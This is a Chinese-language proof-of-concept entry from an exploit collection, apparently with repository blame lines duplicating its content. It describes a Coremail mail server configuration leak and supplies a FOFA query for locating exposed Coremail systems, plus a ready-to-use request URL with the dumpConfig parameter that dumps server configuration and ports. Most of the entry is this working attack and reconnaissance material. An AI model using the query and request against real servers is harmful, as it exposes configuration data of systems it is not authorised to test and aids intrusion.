Awesome-POC/Web应用漏洞/Coremail 配置信息泄露漏洞.md

# Coremail 配置信息泄露漏洞

## 漏洞描述

Coremail 某个接口存在配置信息泄露漏洞，其中存在端口，配置信息等

## 漏洞影响

```
Coremail 配置信息泄露漏洞
```

## FOFA

```
app="Coremail邮件系统"
```

## 漏洞复现

POC为

```plain
http://xxx.xxx.xxx.xxx/mailsms/s?func=ADMIN:appState&dumpConfig=/
```

![](./images/202202101913188.png)
Web应用漏洞 2022-05-17 17:43:20 +08:00			`# Coremail 配置信息泄露漏洞`

			`## 漏洞描述`

			`Coremail 某个接口存在配置信息泄露漏洞，其中存在端口，配置信息等`

			`## 漏洞影响`

			```
			`Coremail 配置信息泄露漏洞`
			```

			`## FOFA`

			```
			`app="Coremail邮件系统"`
			```

			`## 漏洞复现`

			`POC为`

			```plain
			`http://xxx.xxx.xxx.xxx/mailsms/s?func=ADMIN:appState&dumpConfig=/`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202202101913188.png)`
Web应用漏洞 2022-05-17 17:43:20 +08:00